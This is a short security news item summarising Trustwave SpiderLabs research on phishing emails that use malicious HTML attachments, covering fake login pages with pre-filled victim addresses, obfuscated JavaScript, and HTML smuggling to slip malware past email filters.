Criminals increasingly turn to malicious HTML file attachments as phish hooks.
Malicious HTML file attachments.
Researchers at Trustwave SpiderLabs have observed a rise in malicious HTML attachments in phishing emails over the past month. Most of these attachments open a phishing page that impersonates a login portal to steal users’ credentials. The researchers note that some of these files will plug the user’s email address into the login field of the phishing page, to trick the user into thinking they had previously logged in:
“SpiderLabs noticed that recent phishing HTML files contained the hard-coded email addresses of the target user – this makes it more convincing to the victim. In the source level, adversaries would employ various levels of code obfuscation. JavaScript codes are usually obfuscated with open-source tools like JavaScript Obfuscator. HTML files are not stand-alone though, as they pull additional jQuery library, CSS and JavaScript code from various remote web servers for handling form objects, and form actions.
“Hard-coding the email addresses helps trick the victim into believing they had previously signed-on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.”
HTML smuggling.
Attackers are also using HTML smuggling to avoid being detected by email security filters:
“To evade email gateways, a technique called HTML smuggling is being utilized by adversaries to deliver malware binary to a target user. This method employs HTML 5 that could work offline by storing a binary in an immutable blob of data in the form of a JavaScript code. When opened through a web browser, the data blob gets decoded into a file object. A download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it.”